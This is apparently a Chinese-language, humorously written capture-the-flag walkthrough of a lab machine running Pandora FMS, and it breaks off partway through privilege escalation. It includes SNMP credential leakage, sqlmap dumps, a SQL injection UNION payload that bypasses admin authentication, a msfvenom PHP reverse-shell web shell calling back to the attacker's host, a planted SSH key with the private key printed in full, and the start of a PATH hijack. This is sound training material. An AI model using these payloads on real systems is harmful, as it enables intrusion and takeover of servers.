🧟无风祭酒🧟
小医救人😈大医济世
☣️先礼后兵☢️
👻 警 👻
🦧文章为笔者学习所整理的内容,本意希望通过知识输出方式达到巩固、筑牢基础的效用。如若有过,还望大哥哥海涵。
微信公众号:acesec
🦾nmap扫描
🪶欢迎nmap急先锋大佬登场🛵:
(nmap:“小样的!老弟一边站着,看哥哥我的表现~”)
┌──(root㉿kali)-[/home/kali/Desktop]
└─# nmap -sS -p- -sC -sV -A --min-rate=5000 10.10.11.136
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-08 02:01 EDT
Nmap scan report for 10.10.11.136
Host is up (0.35s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 24:c2:95:a5:c3:0b:3f:f3:17:3c:68:d7:af:2b:53:38 (RSA)
| 256 b1:41:77:99:46:9a:6c:5d:d2:98:2f:c0:32:9a:ce:03 (ECDSA)
|_ 256 e7:36:43:3b:a9:47:8a:19:01:58:b2:bc:89:f6:51:08 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Play | Landing
|_http-server-header: Apache/2.4.41 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=4/8%OT=22%CT=1%CU=34068%PV=Y%DS=2%DC=T%G=Y%TM=624FD00D
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=2%ISR=10C%TI=Z%CI=Z%TS=C)SEQ(SP=10
OS:1%GCD=1%ISR=109%TI=Z%CI=Z%II=I%TS=C)OPS(O1=M505ST11NW7%O2=M505ST11NW7%O3
OS:=M505NNT11NW7%O4=M505ST11NW7%O5=M505ST11NW7%O6=M505ST11)WIN(W1=FE88%W2=F
OS:E88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M505NNSNW
OS:7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF
OS:=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=
OS:%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=
OS:0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RI
OS:PCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 357.00 ms 10.10.14.1
2 357.08 ms 10.10.11.136
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 91.57 seconds
🦿nmap扫出来了22和80两个端口,老规矩,走!看看80端口这位老朋友
🦿翻箱倒柜,nothing!!!
😈:nmap哥哥,还有招吗?
nmap:emm~有了💡,我再给它来猛猛滴加剂 毒 药 --> UDP scan
┌──(root㉿kali)-[/home/kali/Desktop]
└─# nmap -sU -top-ports=20 10.10.11.136
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-08 02:31 EDT
Nmap scan report for 10.10.11.136
Host is up (0.34s latency).
PORT STATE SERVICE
53/udp closed domain
67/udp closed dhcps
68/udp closed dhcpc
69/udp closed tftp
123/udp closed ntp
135/udp closed msrpc
137/udp closed netbios-ns
138/udp closed netbios-dgm
139/udp closed netbios-ssn
161/udp open snmp
162/udp open|filtered snmptrap
445/udp open|filtered microsoft-ds
500/udp closed isakmp
514/udp closed syslog
520/udp closed route
631/udp closed ipp
1434/udp closed ms-sql-m
1900/udp closed upnp
4500/udp closed nat-t-ike
49152/udp closed unknown
Nmap done: 1 IP address (1 host up) scanned in 26.13 seconds
🦿161端口,SNMP服务(嘿嘿!口子~🤤🤤)
🦾snmpwalk
🦿尝试使用snmpwalk对其进行连接
┌──(root㉿kali)-[/home/kali/Desktop]
└─# snmpwalk -v 2c -c public 10.10.11.136
–v:指定snmp的版本, 1或者2c或者3
–c:指定连接设备SNMP密码
🐷:兄弟们,醒醒啊,睁大眼睛,听我讲讲呐:扫描出来信息很多,但是不要在那傻呵呵~喝可乐🥤等着哟
🦿从扫描信息中获取到这么一行信息:
1.25.4.2.1.5.855 = STRING: "-c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p HotelBabylon23'"
👓猜?!我猜像哪谁~像极了账号:daniel
密码:HotelBabylon23
🦾SSH登录
🦿再结合之前扫出来的端口22,进行SSH登录尝试
┌──(root㉿kali)-[/home/kali/Desktop]
└─# ssh daniel@10.10.11.136
The authenticity of host '10.10.11.136 (10.10.11.136)' can't be established.
ED25519 key fingerprint is SHA256:yDtxiXxKzUipXy+nLREcsfpv/fRomqveZjm6PXq9+BY.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.136' (ED25519) to the list of known hosts.
daniel@10.10.11.136's password:
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Fri 8 Apr 08:46:26 UTC 2022
System load: 0.0 Processes: 227
Usage of /: 63.0% of 4.87GB Users logged in: 1
Memory usage: 16% IPv4 address for eth0: 10.10.11.136
Swap usage: 0%
=> /boot is using 91.8% of 219MB
0 updates can be applied immediately.
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Fri Apr 8 08:04:54 2022 from 10.10.14.11
daniel@pandora:~$
🗽成功进入敌区。
🦿对敌区外围发起扫荡:
daniel@pandora:~$ ls -la
total 36
drwxr-xr-x 6 daniel daniel 4096 Apr 8 07:38 .
drwxr-xr-x 4 root root 4096 Dec 7 14:32 ..
lrwxrwxrwx 1 daniel daniel 9 Jun 11 2021 .bash_history -> /dev/null
-rw-r--r-- 1 daniel daniel 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 daniel daniel 3771 Feb 25 2020 .bashrc
drwx------ 2 daniel daniel 4096 Apr 8 07:29 .cache
drwx------ 2 daniel daniel 4096 Apr 8 07:33 .gnupg
drwxrwxr-x 3 daniel daniel 4096 Apr 8 07:38 .local
-rw-r--r-- 1 daniel daniel 807 Feb 25 2020 .profile
drwx------ 2 daniel daniel 4096 Dec 7 14:32 .ssh
daniel@pandora:~$ pwd
/home/daniel
daniel@pandora:~$ cd ..
daniel@pandora:/home$ ls -la
total 16
drwxr-xr-x 4 root root 4096 Dec 7 14:32 .
drwxr-xr-x 18 root root 4096 Dec 7 14:32 ..
drwxr-xr-x 6 daniel daniel 4096 Apr 8 07:38 daniel
drwxr-xr-x 2 matt matt 4096 Dec 7 15:00 matt
daniel@pandora:/home$ cd matt
daniel@pandora:/home/matt$ ls -la
total 24
drwxr-xr-x 2 matt matt 4096 Dec 7 15:00 .
drwxr-xr-x 4 root root 4096 Dec 7 14:32 ..
lrwxrwxrwx 1 matt matt 9 Jun 11 2021 .bash_history -> /dev/null
-rw-r--r-- 1 matt matt 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 matt matt 3771 Feb 25 2020 .bashrc
-rw-r--r-- 1 matt matt 807 Feb 25 2020 .profile
-rw-r----- 1 root matt 33 Apr 8 05:52 user.txt
🦿战利品user.txt 嘿嘿~🤤😍
daniel@pandora:/home/matt$ cat user.txt
cat: user.txt: Permission denied
🦿没权限!!!那努努力提权权!
🦿查看端口信息:
daniel@pandora:/home/matt$ netstat -ano
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State Timer
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 10.10.11.136:22 10.10.14.11:44696 ESTABLISHED keepalive (3861.38/0/0)
tcp 0 1 10.10.11.136:48544 1.1.1.1:53 SYN_SENT on (7.27/3/0)
tcp 0 0 10.10.11.136:22 10.10.14.11:44644 ESTABLISHED keepalive (1723.91/0/0)
tcp 0 216 10.10.11.136:22 10.10.14.9:52190 ESTABLISHED on (0.57/0/0)
tcp6 0 0 :::80 :::* LISTEN off (0.00/0/0)
tcp6 0 0 :::22 :::* LISTEN off (0.00/0/0)
udp 0 0 127.0.0.53:53 0.0.0.0:* off (0.00/0/0)
udp 0 0 0.0.0.0:161 0.0.0.0:* off (0.00/0/0)
udp 0 0 127.0.0.1:39337 127.0.0.53:53 ESTABLISHED off (0.00/0/0)
udp6 0 0 ::1:161 :::* off (0.00/0/0)
🦿翻看时,发现在/var/www的目录下存在一个叫pandora的网站
daniel@pandora:/var/www$ ls -la
total 16
drwxr-xr-x 4 root root 4096 Dec 7 14:32 .
drwxr-xr-x 14 root root 4096 Dec 7 14:32 ..
drwxr-xr-x 3 root root 4096 Dec 7 14:32 html
drwxr-xr-x 3 matt matt 4096 Dec 7 14:32 pandora
🦿继续翻看翻看,还发现有apache的配置文件信息:
daniel@pandora:/etc/apache2/sites-available$ ls -la
total 24
drwxr-xr-x 2 root root 4096 Dec 7 12:59 .
drwxr-xr-x 8 root root 4096 Dec 7 12:59 ..
-rw-r--r-- 1 root root 1332 Apr 13 2020 000-default.conf
-rw-r--r-- 1 root root 6338 Apr 13 2020 default-ssl.conf
-rw-r--r-- 1 root root 315 Dec 3 12:56 pandora.conf
daniel@pandora:/etc/apache2/sites-available$ cat pandora.conf
<VirtualHost localhost:80>
ServerAdmin admin@panda.htb
ServerName pandora.panda.htb
DocumentRoot /var/www/pandora
AssignUserID matt matt
<Directory /var/www/pandora>
AllowOverride All
</Directory>
ErrorLog /var/log/apache2/error.log
CustomLog /var/log/apache2/access.log combined
</VirtualHost>
仔细通读配置文件,我们发现网站pandora只能够通过本地localhost的方式进行访问。
🦾SSH隧道
🦿利用ssh代理实现 性福 需求。SSH隧道:
┌──(root㉿kali)-[/home/kali/Desktop]
└─# ssh -L 80:127.0.0.1:80 daniel@10.10.11.136
daniel@10.10.11.136's password:
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Mon 11 Apr 05:43:49 UTC 2022
System load: 0.03 Processes: 225
Usage of /: 64.1% of 4.87GB Users logged in: 1
Memory usage: 9% IPv4 address for eth0: 10.10.11.136
Swap usage: 0%
=> /boot is using 91.8% of 219MB
0 updates can be applied immediately.
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Mon Apr 11 05:37:47 2022 from 10.10.14.28
🦿代理成功,浏览器直接访问127.0.0.1
即可访问到靶机本地存在的web服务
🦿仔细一看网页标题,是Pandora FMS
,网页底端是其版本v7.0NG.742_FIX_PERL2020
🦿在https://www.cvedetails.com/查看是否存在洞洞
🦿可见注入点为:
pandora_console/include/chart_generator.php的session_id
🦾sqlmap
🦿sqlmap一把梭
sqlmap -u "http://127.0.0.1/pandora_console/include/chart_generator.php?session_id=''" --batch //探测该url是否存在漏洞 // --batch 从不询问用户输入,使用所有默认配置
sqlmap -u "http://127.0.0.1/pandora_console/include/chart_generator.php?session_id=''" --batch --dbms=mysql --dbs //指定其数据库为mysql //爆出所有的数据库
sqlmap -u "http://127.0.0.1/pandora_console/include/chart_generator.php?session_id=''" --batch --dbms=mysql -D pandora --tables //爆出所有的数据表
//和session相关的只有三张表,测试后选择tsessions_php表
sqlmap -u "http://127.0.0.1/pandora_console/include/chart_generator.php?session_id=''" --batch --dbms=mysql -D pandora -T tsessions_php --columns //爆出数据库中所有的列
sqlmap -u "http://127.0.0.1/pandora_console/include/chart_generator.php?session_id=''" --batch --dbms=mysql -D pandora -T tsessions_php -C id_session,data,last_active --dump //dump出数据
Database: pandora
Table: tsessions_php
[43 entries]
+----------------------------+-----------------------------------------------------+
| id_session | data |
+----------------------------+-----------------------------------------------------+
| 09vao3q1dikuoi1vhcvhcjjbc6 | id_usuario|s:6:"daniel"; |
| 0ahul7feb1l9db7ffp8d25sjba | NULL |
| 1um23if7s531kqf5da14kf5lvm | NULL |
| 20u1oic55kc43dvc3haongjstm | NULL |
| 2e25c62vc3odbppmg6pjbf9bum | NULL |
| 346uqacafar8pipuppubqet7ut | id_usuario|s:6:"daniel"; |
| 3me2jjab4atfa5f8106iklh4fc | NULL |
| 4f51mju7kcuonuqor3876n8o02 | NULL |
| 4nsbidcmgfoh1gilpv8p5hpi2s | id_usuario|s:6:"daniel"; |
| 59qae699l0971h13qmbpqahlls | NULL |
| 5fihkihbip2jioll1a8mcsmp6j | NULL |
| 5i352tsdh7vlohth30ve4o0air | id_usuario|s:6:"daniel"; |
| 69gbnjrc2q42e8aqahb1l2s68n | id_usuario|s:6:"daniel"; |
| 81f3uet7p3esgiq02d4cjj48rc | NULL |
| 8m2e6h8gmphj79r9pq497vpdre | id_usuario|s:6:"daniel"; |
| 8upeameujo9nhki3ps0fu32cgd | NULL |
| 9vv4godmdam3vsq8pu78b52em9 | id_usuario|s:6:"daniel"; |
| a3a49kc938u7od6e6mlip1ej80 | NULL |
| agfdiriggbt86ep71uvm1jbo3f | id_usuario|s:6:"daniel"; |
| cojb6rgubs18ipb35b3f6hf0vp | NULL |
| d0carbrks2lvmb90ergj7jv6po | NULL |
| f0qisbrojp785v1dmm8cu1vkaj | id_usuario|s:6:"daniel"; |
| fikt9p6i78no7aofn74rr71m85 | NULL |
| fqd96rcv4ecuqs409n5qsleufi | NULL |
| g0kteepqaj1oep6u7msp0u38kv | id_usuario|s:6:"daniel"; |
| g4e01qdgk36mfdh90hvcc54umq | id_usuario|s:4:"matt";alert_msg|a:0:{}new_chat|b:0; |
| gf40pukfdinc63nm5lkroidde6 | NULL |
| gktu0to59na3mnhbgfcv2tkhqv | id_usuario|s:6:"daniel"; |
| heasjj8c48ikjlvsf1uhonfesv | NULL |
| hsftvg6j5m3vcmut6ln6ig8b0f | id_usuario|s:6:"daniel"; |
| i4in616e9cq1cacqvfdblmrc41 | NULL |
| jecd4v8f6mlcgn4634ndfl74rd | id_usuario|s:6:"daniel"; |
| kp90bu1mlclbaenaljem590ik3 | NULL |
| ne9rt4pkqqd0aqcrr4dacbmaq3 | NULL |
| noqn8u3jj894l2r4jsjrvrpla8 | id_usuario|s:6:"daniel"; |
| o3kuq4m5t5mqv01iur63e1di58 | id_usuario|s:6:"daniel"; |
| oi2r6rjq9v99qt8q9heu3nulon | id_usuario|s:6:"daniel"; |
| pjp312be5p56vke9dnbqmnqeot | id_usuario|s:6:"daniel"; |
| qq8gqbdkn8fks0dv1l9qk6j3q8 | NULL |
| r097jr6k9s7k166vkvaj17na1u | NULL |
| rgku3s5dj4mbr85tiefv53tdoa | id_usuario|s:6:"daniel"; |
| u5ktk2bt6ghb7s51lka5qou4r4 | id_usuario|s:6:"daniel"; |
| u74bvn6gop4rl21ds325q80j0e | id_usuario|s:6:"daniel"; |
+----------------------------+-----------------------------------------------------+
🦿根据dump出来的数据,我竟然没有扫出来admin,就...... 🩴🩴🩴伺候*#¥##%&***sqlmap怎么干活的!🔞
🦾构造POC
🦿意淫构造POC:
http://127.0.0.1/pandora_console/include/chart_generator.php?session_id=a' UNION SELECT 1,2,'id_usuario|s:5:"admin";' as data -- acesec
🦿流氓器访问POC,即可进入后台
可能访问POC之后需要再访问http://127.0.0.1/pandora_console/
🦿寻找上传地点:
🦾构造POC
🦿把MSF找来,我要和它生孩子,啊呸!生一个php反弹shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.14.28 LPORT=1235 -f raw > ace.php
🦿上传ace.php
🫁启动msfconsole:
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf6 exploit(multi/handler) > set LHOST 10.10.14.28
LHOST => 10.10.14.28
msf6 exploit(multi/handler) > set LPORT 1235
LPORT => 1235
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 10.10.14.28:1235
[*] Sending stage (39282 bytes) to 10.10.11.136
[*] Meterpreter session 1 opened (10.10.14.28:1235 -> 10.10.11.136:45524 ) at 2022-04-11 04:37:58 -0400
meterpreter > shell
🪶题外话:若是出错,可能是端口占用的话, 🔪杀口口
netstat -anop
kill -9 端口的PID
🦿访问shell:
http://127.0.0.1/pandora_console/images/ace.php
🦿获得会话:
meterpreter > shell
Process 13568 created.
Channel 0 created.
whoami
matt
id
uid=1000(matt) gid=1000(matt) groups=1000(matt)
pwd
/var/www/pandora/pandora_console/images
cd /home/matt
pwd
/home/matt
ls
user.txt
cat user.txt
e43427293c88afa40d19522f6b53f119
🦾超级无敌可爱root
🦿权限提升到root
🦿升级交互式shell:
python3 -c "import pty;pty.spawn('/bin/bash')"
🦿看一下拥有suid权限的文件
matt@pandora:/$ find / -perm -u=s 2> /dev/null
find / -perm -u=s 2> /dev/null
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/pandora_backup
/usr/bin/passwd
/usr/bin/mount
/usr/bin/su
/usr/bin/at
/usr/bin/fusermount
/usr/bin/chsh
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
发现一个非常显眼的二进制文件:pandora_backup
🦿查看root拥有的suid文件:
matt@pandora:/$ find / -uid 0 -perm -4000 -type f 2>/dev/null
find / -uid 0 -perm -4000 -type f 2>/dev/null
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/pandora_backup
/usr/bin/passwd
/usr/bin/mount
/usr/bin/su
/usr/bin/fusermount
/usr/bin/chsh
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
🦿运行pandora_backup,会报错:
matt@pandora:/$ sudo /usr/bin/pandora_backup
sudo /usr/bin/pandora_backup
sudo: PERM_ROOT: setresuid(0, -1, -1): Operation not permitted
sudo: unable to initialize policy plugin
🦿猫弟弟深入摸清:
matt@pandora:/$ cat /usr/bin/pandora_backup
cat /usr/bin/pandora_backup
ELF>�@0:@8
@@@@h���HHmm HH�-�=�=hp�-�=�=����DDP�td� � � <<Q�tdR�td�-�=�=▒▒/lib64/ld-linux-x86-64.so.2GNUqtðG7�%H9�
��f��Z�GNU
�
�e�m\ 4x � %"putssetreuidsystemgetuidgeteuid__cxa_finalize__libc_start_mainlibc.so.6GLIBC_2.2.5_ITM_deregisterTMCloneTable__gmon_start___ITM_registerTMCloneTableFu▒i P�p�0HH@�?�?�?�? �?
SH�=��&/�DH�=�/H��/H9�tH��.H��t/�����H�=Y/H�5R/H)�H��H��?H��H�H��tH��.H����fD���=/u/UH�=�.H��t^H��H���PTL��H�
H�=�.�-����h�����.]�����{���UH��SH��������������މ������H�=n�����H�=������H�=���������tH�=��d�����H�=��Q���H�=��E����H�]���f.�AWL�=�+AVI��AUI��ATA��UH�-�+SL)�H������H��t�L��L��D��A��H��H9�u�H�[]A\A]A^A_��H�H��PandoraFMS Backup UtilityNow attempting to backup PandoraFMS clienttar -cvf /root/.backup/pandora-backup.tar.gz /var/www/pandora/pandora_console/*Backup failed!
Check your permissions!Backup successful!Terminating program!<(�������������X}�������h���8zRx
8���+zRx
$����`F▒J
E�w �?▒;*3$"D���$\�����A�C
D����]B�I▒�E �E(�D0�H8�G@j8A0A(B B▒B�(���p0F
d�▒����80
�
▒@x� ▒������o����o���o����o�=6FVfvH@GCC: (Debian 10.2.1-6) 10.2.1 20210110��08�
�
��d � 8!�=�=�=�?@▒@@P@▒��
��!07P@C�=jpv�=������D"����=��=��=�� �@�
` � ▒@@.?▒P@
dFYl��▒@@� �▒H@� �]�X@��+��P@u�
▒P@▒ 2"crtstuff.cderegister_tm_clones__do_global_dtors_auxcompleted.0__do_global_dtors_aux_fini_array_entryframe_dummy__frame_dummy_init_array_entrybackup.c__FRAME_END____init_array_end_DYNAMIC__init_array_start__GNU_EH_FRAME_HDR_GLOBAL_OFFSET_TABLE___libc_csu_fini_ITM_deregisterTMCloneTableputs@GLIBC_2.2.5_edatagetuid@GLIBC_2.2.5system@GLIBC_2.2.5geteuid@GLIBC_2.2.5__libc_start_main@GLIBC_2.2.5__data_start__gmon_start____dso_handle_IO_stdin_used__libc_csu_initsetreuid@GLIBC_2.2.5__bss_startmain__TMC_END___ITM_registerTMCloneTable__cxa_finalize@GLIBC_2.2.5.symtab.strtab.shstrtab.interp.note.gnu.build-id.note.ABI-tag.gnu.hash.dynsym.dynstr.gnu.version.gnu.version_r.rela.dyn.rela.plt.init.plt.got.text.fini.rodata.eh_frame_hdr.eh_frame.init_array.fini_array.dynamic.got.plt.data.bss.comment�#��$6�� D��No
▒V88�^���o��k���o��z▒�B��▒�� `�����dd � �� � <�8!8������=�-��?��@�@@@P@P�0P0'x0`▒ �6M%9
🦿有个tar命令对pandora应用文件进行备份,可以通过创建一个tar文件然后将其加入环境变量进行提权。
🦾诺曼底登陆前夜:生成SSH迷药
🦿想登录SSH?!当然我们还没有抄家抄到matt的密码或者ssh的密钥。😮💨人生无常,大肠包小肠,只能自己一个人扛下所有,生成一个密钥
matt@pandora:/home/matt$ ssh-keygen
ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/matt/.ssh/id_rsa):
Created directory '/home/matt/.ssh'.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/matt/.ssh/id_rsa
Your public key has been saved in /home/matt/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:wpZH1lckSqXsYgZVfzUKLhYuXBEFTrA9wU7paeS23JY matt@pandora
The key's randomart image is:
+---[RSA 3072]----+
| .+XO+o.o..|
| ..BO++.o...|
| .+OB*.o.. |
| . =oOo. . |
| = S + . |
| . = + E |
| . |
| |
| |
+----[SHA256]-----+
🐷:一直按回车键(刹不住车车了~)
matt@pandora:/home/matt$ cd .ssh
cd .ssh
matt@pandora:/home/matt/.ssh$ ls
ls
id_rsa id_rsa.pub
matt@pandora:/home/matt/.ssh$ cat id_rsa.pub > authorized_keys
cat id_rsa.pub > authorized_keys
matt@pandora:/home/matt/.ssh$ chmod 700 authorized_keys
chmod 700 authorized_keys
matt@pandora:/home/matt/.ssh$ cat id_rsa
cat id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEAq7/6VZZYy1lOQsX3PF4NXnkjGQzAyn/kISq1209g7A+q6JaJIpvV
v3vceZjtaLNEA0csSa9WFNqs/RInn6bpEQS1TyLrez8nGny7CFGWiemXSggcuRb9hQ6ndJ
Z9Mh9ot6DU8OAtBJ5FtrOTwTQd9pqHF1nCfLSGp6D/Xnjci+5Md+MuLFxF5jpQuK827x2/
lP2V3TaUtIYQwtrY1U9svnnZJDabrWI4G0eLW7FQJcQATbnlds8BEX7MUIDdv2XEPHIAAD
m7FcpCKep0ZtdZ+1EgYka9oBJ6FT6viTjKXi31MpQWFwvzS/WuVY0EwocHO8qIcAh1ci24
7pEfKi4nRQ/n+42laOtvBt8WtDfamuz4TdtIg53i70gmYNs9sSzBG4bu9okvuaYgd8cP7D
eRey9EVvll93klx/nb1Y50EuJCdoFhwsOiS1n1vx0V7tn19UhziCuVUBGUwcvsU6NdT5cN
GnZG8rtc9hbzuN5LVq4Mhwj9MX6ys81DIZ455sd3AAAFiNVpbODVaWzgAAAAB3NzaC1yc2
EAAAGBAKu/+lWWWMtZTkLF9zxeDV55IxkMwMp/5CEqtdtPYOwPquiWiSKb1b973HmY7Wiz
RANHLEmvVhTarP0SJ5+m6REEtU8i63s/Jxp8uwhRlonpl0oIHLkW/YUOp3SWfTIfaLeg1P
DgLQSeRbazk8E0HfaahxdZwny0hqeg/1543IvuTHfjLixcReY6ULivNu8dv5T9ld02lLSG
EMLa2NVPbL552SQ2m61iOBtHi1uxUCXEAE255XbPARF+zFCA3b9lxDxyAAA5uxXKQinqdG
bXWftRIGJGvaASehU+r4k4yl4t9TKUFhcL80v1rlWNBMKHBzvKiHAIdXItuO6RHyouJ0UP
5/uNpWjrbwbfFrQ32prs+E3bSIOd4u9IJmDbPbEswRuG7vaJL7mmIHfHD+w3kXsvRFb5Zf
d5Jcf529WOdBLiQnaBYcLDoktZ9b8dFe7Z9fVIc4grlVARlMHL7FOjXU+XDRp2RvK7XPYW
87jeS1auDIcI/TF+srPNQyGeOebHdwAAAAMBAAEAAAGBAJypAWv+NsJNlKA9uRW8aI9rCY
O46UYMwAcs0TLZRfwtEmUTosUJxj/ieCoGP0+IbRpcWl5f67IcATzZyYDMG72lQMiNfqQt
57o2Wdftq9XiV1h069Y8zUUIJ+ClwE7u7XLJ5lJM+WNEByzuwnCx3D7rlxvKiSd893KB3U
3MCsgstl2IwL4/8JZfTPAZCo+z3+PEJ2Xfembr/u/t9WklCHj55gItOXU+qRTg/pHFu+im
zuwXC+KCUWQm97DayunhpU01m205SwkqizW/+2aDX1kv7FU6nOTdzttdVuLZRjzMh0yHek
hVa1TA+IJxhzO8Httvbq2+v0ZmVGo02LcQjH5Rj8G1FIycBwcBbmrRHmBVfy3rdQta1+yu
DlVEYie4KCMvtqbbE7IBL5MTOZqEw8enFEbZ24WAcQ02fKzcJluEmcnj3YxOR8YQCfdq6z
vXIPRYIkbqZENNDJAzvqyfy3JIaSFkrErayi3Hd46yx4ynzpLqcS2Cp54RkQVjMTYNGQAA
AMEAhE3AAL5P1Pu+mVCUXkQgnB/7qjMUxCTtrFW2nM3N/HMNfpnj4evzC1FUzbUO9xrwQA
7t41iSeoRFfMyouLfbhasDpr+nlN6ZWKxbj9XdMQErF2e6NHPnLZjSwpeMOCTYNErkTdy/
hutSS367W37yuSUnILO4/Sg05Gk+YN8ddj4pQ2Wmu8l+1lpgEEt1QqLXhPgIC3JdPQdm3T
QYMvDYUociquyf7zPXLRcndOxu586FchrLPWONylN4nZrKc6J5AAAAwQDhxpwceT4GGZXD
/3db2bXhWjQb0NXra1tR4pczq8yzaXiHgh5drZuN2gNffrVDZzRM3jbLM4tWg1gLk7fsC9
gKPbB0vzhmd6fXbDpONrv580HhO8MeBbCMf+IMi+uX9DvO6i/HqkggTn3Hg58D1vCewRWn
vaOPYx5UDGpjBsDqfqsDHHGezMQUFw18gFdEOkkO9mEZCobRx6F43Is77lpI90j/DmwqdV
SLnm8CPF+OdK8hgJu+vMTf09nJFxLdvlsAAADBAMK94zqO5HjAxzAUCPV2xCLOfpakE+2q
jTTeiGejmyhjvwmJmTPwAdGpEHY3YXKLn5AjfTZxADNXLy2X112ufz/U1UlH/qBxHa6TQp
OQHjltNBqEeBRK+YNIJRIHBuph5Nst/aGojcqlhaTWuEaTo7c1QZVNfLMj5/hGJm0VZFqN
wDwP9sglL8K4RqbcRIlfkXFkeJMJ71kznAMQ1HbZGYIjiySTQizgVVWsJ5Y1bboEiAilg4
G4me+rAzJr/86eFQAAAAxtYXR0QHBhbmRvcmEBAgMEBQ==
-----END OPENSSH PRIVATE KEY-----
🦿在kali本地新建id_rsa,将上面的内容复制进去:
┌──(root㉿kali)-[/home/kali]
└─# vim id_rsa
┌──(root㉿kali)-[/home/kali]
└─# chmod 700 id_rsa
⛵东风已来,上船!SSH登录大战:
┌──(root㉿kali)-[/home/kali]
└─# ssh matt@10.10.11.136 -i id_rsa
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Mon 11 Apr 09:58:40 UTC 2022
System load: 1.02 Processes: 269
Usage of /: 64.3% of 4.87GB Users logged in: 1
Memory usage: 17% IPv4 address for eth0: 10.10.11.136
Swap usage: 0%
=> /boot is using 91.8% of 219MB
=> There are 2 zombie processes.
0 updates can be applied immediately.
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
matt@pandora:~$
中华人民共和国万岁!上岸!
🦿切换到matt的用户目录,然后创建一个假的tar可执行文件,,并将matt的家路径注入PATH变量中
matt@pandora:~$ cd /home/matt
